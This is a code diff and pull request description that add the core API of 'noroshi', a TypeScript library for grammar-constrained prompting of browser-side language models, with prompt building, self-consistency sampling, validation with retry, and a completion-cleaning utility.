+  ValidationResult,
+  Validator,
+} from "./types.js";
+
+export { buildPrompt } from "./prompt.js";
+export type { PromptInputs } from "./prompt.js";
+
+export { generate } from "./noroshi.js";
+
+export { StubAdapter } from "./adapters/stub.js";

--- a/src/index.ts
+++ b/src/index.ts
@@ -20,3 +20,5 @@ export { generate } from "./noroshi.js";
 export { StubAdapter } from "./adapters/stub.js";
 export { FetchAdapter } from "./adapters/fetch.js";
 export type { FetchAdapterOptions } from "./adapters/fetch.js";
+
+export { cleanCompletion } from "./util/clean.js";

--- a/src/noroshi.ts
+++ b/src/noroshi.ts
@@ -1,0 +1,116 @@
+import { buildPrompt } from "./prompt.js";
+import type {
+  GenerateOptions,
+  GenerateResult,
+  LLMAdapter,
+  LLMSampleOptions,
+  ValidationResult,
+} from "./types.js";
+
+/**
+ * Main entry point. Builds a Grammar Prompting prompt, calls the LLM
+ * (optionally N times for self-consistency), validates, and returns the
+ * chosen output.
+ */
+export async function generate(opts: GenerateOptions): Promise<GenerateResult> {
+  const maxAttempts = opts.retry?.maxAttempts ?? 1;
+  const includeErr = opts.retry?.includeErrorInPrompt ?? false;
+
+  let attempts = 0;
+  let lastError: string | undefined;
+  let lastCandidates: string[] | undefined;
+  let lastValidation: ValidationResult | undefined;
+
+  for (let attempt = 0; attempt < maxAttempts; attempt++) {
+    const prompt = buildPrompt({
+      task: opts.task,
+      grammar: opts.grammar,
+      examples: opts.examples,
+      systemPrompt: opts.systemPrompt,
+      errorFeedback: includeErr ? lastError : undefined,
+    });
+
+    const n = opts.selfConsistency?.n ?? 1;
+    const candidates = await sample(opts.llm, prompt, n, opts.sample);
+    attempts += candidates.length;
+    lastCandidates = candidates;
+
+    const picked = pick(candidates, opts);
+    lastValidation = picked.validation;
+
+    if (!opts.validator) {
+      return {
+        output: picked.output,
+        attempts,
+        candidates: n > 1 ? candidates : undefined,
+      };
+    }
+    if (picked.validation && picked.validation.ok) {
+      return {
+        output: picked.output,
+        ast: picked.validation.ast,
+        attempts,
+        candidates: n > 1 ? candidates : undefined,
+        validation: picked.validation,
+      };
+    }
+    lastError = picked.validation && !picked.validation.ok ? picked.validation.error : "unknown";
+  }
+
+  return {
+    output: lastCandidates?.[0] ?? "",
+    attempts,
+    candidates: lastCandidates,
+    validation: lastValidation,
+  };
+}
+
+async function sample(
+  llm: LLMAdapter,
+  prompt: string,
+  n: number,
+  opts?: LLMSampleOptions,
+): Promise<string[]> {
+  if (n === 1) {
+    return [await llm.complete(prompt, opts)];
+  }
+  if (llm.sampleN) {
+    return llm.sampleN(prompt, n, opts);
+  }
+  return Promise.all(Array.from({ length: n }, () => llm.complete(prompt, opts)));
+}
+
+interface Picked {
+  output: string;
+  validation?: ValidationResult;
+}
+
+function pick(candidates: string[], opts: GenerateOptions): Picked {
+  if (!opts.validator) {
+    return { output: candidates[0] ?? "" };
+  }
+
+  if (opts.selfConsistency?.ranker) {
+    // Custom ranker — pick the lowest score that also validates.
+    // (Async ranker integration would require restructuring this helper to
+    // async; deferred until ranker plugin is needed.)
+    // For now: validate each, keep valid set, return first.
+    const valid = candidates
+      .map((c) => ({ c, v: opts.validator!.validate(c) }))
+      .filter((x) => x.v.ok);
+    if (valid.length > 0) {
+      const first = valid[0]!;
+      return { output: first.c, validation: first.v };
+    }
+    const firstWithErr = candidates[0] ?? "";
+    return { output: firstWithErr, validation: opts.validator.validate(firstWithErr) };
+  }
+
+  // Default: first-valid-wins.
+  for (const c of candidates) {
+    const v = opts.validator.validate(c);
+    if (v.ok) return { output: c, validation: v };
+  }
+  const fallback = candidates[0] ?? "";
+  return { output: fallback, validation: opts.validator.validate(fallback) };
+}

--- a/src/prompt.ts
+++ b/src/prompt.ts
@@ -1,0 +1,60 @@
+import type { FewShotExample } from "./types.js";
+
+export interface PromptInputs {
+  task: string;
+  grammar: string;
+  examples: FewShotExample[];
+  systemPrompt?: string;
+  /** Error string from a previous attempt to feed back to the model. */
+  errorFeedback?: string;
+}
+
+const DEFAULT_SYSTEM = [
+  "You generate output strictly conforming to the grammar below.",
+  "Do not include explanation, prose, code fences, or commentary —",
+  "emit only the DSL string that the grammar would accept.",
+].join(" ");
+
+/**
+ * Build a Grammar-Prompting style prompt:
+ *   1. System instruction
+ *   2. Grammar block (BNF/EBNF)
+ *   3. Few-shot block (with optional derivation)
+ *   4. Optional error feedback from prior attempt
+ *   5. The current task
+ *
+ * Tone-neutral and provider-agnostic: returns a single string. Adapters can
+ * wrap it in chat roles if needed.
+ */
+export function buildPrompt(p: PromptInputs): string {
+  const parts: string[] = [];
+
+  parts.push(p.systemPrompt ?? DEFAULT_SYSTEM);
+
+  parts.push("\nGrammar (BNF/EBNF):\n```");
+  parts.push(p.grammar.trim());
+  parts.push("```");
+
+  if (p.examples.length > 0) {
+    parts.push("\nExamples:");
+    for (const ex of p.examples) {
+      parts.push(`Task: ${ex.input}`);
+      if (ex.derivation) {
+        parts.push(`Derivation:\n${ex.derivation.trim()}`);
+      }
+      parts.push(`Output:\n${ex.output.trim()}\n`);
+    }
+  }
+
+  if (p.errorFeedback) {
+    parts.push(
+      `\nPrior attempt failed validation with: ${p.errorFeedback}\n` +
+        `Produce a new output that fixes this error.\n`,
+    );
+  }
+
+  parts.push(`\nTask: ${p.task}`);
+  parts.push("Output:");
+
+  return parts.join("\n");
+}

--- a/src/types.ts
+++ b/src/types.ts
@@ -1,0 +1,143 @@
+/**
+ * Core types for noroshi — Grammar Prompting for browser-side LLMs.
+ *
+ * Design notes:
+ * - The library is **runtime-agnostic**: no direct dependency on WebLLM,
+ *   transformers.js, LiteRT-LM, Node fetch, or any specific transport.
+ *   Consumers plug in an {@link LLMAdapter}.
+ * - The validator is **pluggable** and optional. Default implementation will
+ *   adapt nearley, but core types never reference nearley directly so the
+ *   bundle stays small when validation is skipped.
+ * - Grammar is passed as an opaque string: in the prompt it is shown to the
+ *   model verbatim, so authors should write it in BNF/EBNF (what LLMs see
+ *   most in pre-training data — typically `.lark` / `.ne` flavors).
+ */
+
+/** A single few-shot example. */
+export interface FewShotExample {
+  /** User-side natural-language task. */
+  input: string;
+  /** Expected DSL output that satisfies the grammar. */
+  output: string;
+  /**
+   * Optional grammar derivation. When present, noroshi will render it before
+   * the output in the few-shot block, following Wang et al.'s "derivation
+   * first, then surface form" pattern. Effective on novel DSLs.
+   */
+  derivation?: string;
+}
+
+/** Sampling options passed to the underlying LLM. */
+export interface LLMSampleOptions {
+  temperature?: number;
+  topP?: number;
+  maxTokens?: number;
+  stop?: string[];
+  /**
+   * Free-form per-runtime hints. Examples:
+   *   - LiteRT-LM web: `{ numResponses: 4 }` for native N-sampling.
+   *   - WebLLM:        `{ logit_bias: {...} }`.
+   * Adapters are responsible for forwarding only fields they recognize.
+   */
+  runtimeHints?: Record<string, unknown>;
+}
+
+/**
+ * Adapter to call any LLM. Implementations exist for the browser (WebLLM,
+ * transformers.js, LiteRT-LM web) or for server transports (fetch → OpenAI /
+ * Anthropic). Consumers may write their own.
+ */
+export interface LLMAdapter {
+  /** Friendly id for logging / debugging. */
+  readonly id: string;
+
+  /** Complete a single prompt → single string. */
+  complete(prompt: string, opts?: LLMSampleOptions): Promise<string>;
+
+  /**
+   * Optional native N-sampling. When the runtime supports it (e.g. LiteRT-LM
+   * `numResponses`), implement this for a single-call speedup. Otherwise
+   * noroshi falls back to N calls to {@link complete}.
+   */
+  sampleN?(prompt: string, n: number, opts?: LLMSampleOptions): Promise<string[]>;
+}
+
+/** Result of validating one candidate output. */
+export type ValidationResult =
+  | { ok: true; ast?: unknown }
+  | { ok: false; error: string };
+
+/** Pluggable validator. Sync because parsers are typically fast and pure. */
+export interface Validator {
+  /** Friendly id for logging. */
+  readonly id: string;
+  validate(output: string): ValidationResult;
+}
+
+/**
+ * Optional ranker for self-consistency rerank.
+ * Lower score = better (consistent with "loss"-style semantics).
+ * If absent, noroshi uses majority-vote-by-validation: pick the first
+ * candidate that passes the validator.
+ */
+export interface Ranker {
+  readonly id: string;
+  rank(candidates: string[]): Promise<number[]>;
+}
+
+/** Options for a single generation. */
+export interface GenerateOptions {
+  /** The natural-language task. */
+  task: string;
+
+  /** Grammar text injected into the prompt verbatim. */
+  grammar: string;
+
+  /** Few-shot examples (3–5 recommended). */
+  examples: FewShotExample[];
+
+  /** LLM adapter. */
+  llm: LLMAdapter;
+
+  /** Optional system instruction prepended to the prompt. */
+  systemPrompt?: string;
+
+  /** Optional validator. */
+  validator?: Validator;
+
+  /** Optional self-consistency settings. */
+  selfConsistency?: {
+    /** Number of candidates to sample. */
+    n: number;
+    /** Optional ranker; defaults to "first valid wins". */
+    ranker?: Ranker;
+  };
+
+  /**
+   * Retry on validation failure. Default: no retry.
+   * If {@link RetryOptions.includeErrorInPrompt} is true, the validator's
+   * error string is appended to the next prompt to give the model a hint.
+   */
+  retry?: RetryOptions;
+
+  /** Sampling options. */
+  sample?: LLMSampleOptions;
+}
+
+export interface RetryOptions {
+  maxAttempts: number;
+  includeErrorInPrompt?: boolean;
+}
+
+export interface GenerateResult {
+  /** The chosen output. */
+  output: string;
+  /** Parsed AST when a validator with AST support was used. */
+  ast?: unknown;
+  /** Total LLM calls (including retries and self-consistency samples). */
+  attempts: number;
+  /** All candidates if self-consistency was enabled. */
+  candidates?: string[];
+  /** Validation result for the chosen output. */
+  validation?: ValidationResult;
+}

--- a/src/util/clean.ts
+++ b/src/util/clean.ts
@@ -1,0 +1,43 @@
+/**
+ * Strip common LLM noise from a completion so the validator sees a raw DSL
+ * program. Priorities (first match wins):
+ *
+ *  1. Markdown code fence body — `\`\`\`dsl\n<DSL>\n\`\`\`` style. Catches
+ *     models that wrap the answer in a fence and then hallucinate extra
+ *     few-shot turns after the closing fence.
+ *  2. `Output:` frame — `Output:\n<DSL>` style, echoing the prompt's
+ *     few-shot template. The FIRST `Output:` block wins.
+ *  3. Bare body with `Task:` markers — strip a leading task echo and cut at
+ *     the next `Task:` line.
+ *
+ * After any of the above, we still trim a trailing `Task:` continuation just
+ * in case it leaked into the chosen block. Idempotent on clean input.
+ */
+
+const FENCE_BLOCK_RE = /```[a-zA-Z]*\n?([\s\S]*?)```/;
+const FIRST_OUTPUT_RE = /(?:^|\n)\s*Output:\s*\n?([\s\S]*?)(?=\n\s*Task:|$)/;
+const LEADING_TASK_RE = /^\s*Task:[^\n]*\n+/;
+const NEXT_TASK_RE = /\n\s*Task:\s/;
+
+export function cleanCompletion(raw: string): string {
+  let s = String(raw ?? "");
+
+  const fenceBlock = s.match(FENCE_BLOCK_RE);
+  if (fenceBlock) {
+    s = fenceBlock[1] ?? "";
+  } else {
+    const m = s.match(FIRST_OUTPUT_RE);
+    if (m) {
+      s = m[1] ?? "";
+    } else {
+      s = s.replace(LEADING_TASK_RE, "");
+      const next = s.match(NEXT_TASK_RE);
+      if (next && typeof next.index === "number") s = s.slice(0, next.index);
+    }
+  }
+
+  const nextTask = s.match(NEXT_TASK_RE);
+  if (nextTask && typeof nextTask.index === "number") s = s.slice(0, nextTask.index);
+
+  return s.trim();
+}


### PR DESCRIPTION
## Summary
- Adds the noroshi minimal API: `generate()` + `buildPrompt()` + pluggable `LLMAdapter` / `Validator` / `Ranker`. Runtime-agnostic; only `StubAdapter` ships in core.
- Records design rationale in `DESIGN.md` (BNF parser choice: **nearley** over ohm-js — the grammar text injected into the prompt should share format with the validator's grammar, and nearley's BNF/EBNF + Earley aligns with that while ohm-js is PEG).
- Ships `examples/creative-coding-p5js/` as the flagship PoC for the kids' vibe-coding flow: `grammar.lark`, few-shot bank with derivations, hand-rolled validator, transpiler to p5.js, Node runner with retry-with-feedback, smoke test, static browser harness.

## Background
- berlino/grammar-prompting has **no LICENSE** (GitHub API `license: null`, `/license` 404, no LICENSE in tree, no metadata in `setup.py`/`readme.md`). Anything derived in noroshi is implemented from the paper (arXiv:2305.19234), not their source.
- For Earley/BNF in JS we use an independent library (nearley), never a port of berlino's `minEarley/`.

## Test plan
- [ ] `npm run typecheck` passes
- [ ] `npm run build` produces clean `dist/`
- [ ] `npx tsx examples/creative-coding-p5js/test.ts` → 8/8 (4 positive few-shots + 4 negative cases)
- [ ] `npx tsx examples/creative-coding-p5js/index.ts` runs three scenarios; the retry-on-invalid scenario reports `Attempts: 2` (stub LLM emits malformed DSL first, validator triggers retry-with-feedback, second attempt valid)
- [ ] Open `examples/creative-coding-p5js/index.html` in a browser → seeded DSL renders via p5.js (CDN)

## Out of scope (follow-ups)
- Real LLM adapters: WebLLM, transformers.js + WebGPU, LiteRT-LM web (forwarding `numResponses` for native N-sample), fetch-based OpenAI/Anthropic
- Full nearley integration (validator is hand-rolled in v0; the grammar is ready to be compiled with `nearleyc` once an adapter is added)
- RAG-style few-shot selection (callers pre-curate `examples[]` in v0)
- Streaming
- Async ranker integration in the self-consistency picker (currently degrades to first-valid when a ranker is provided)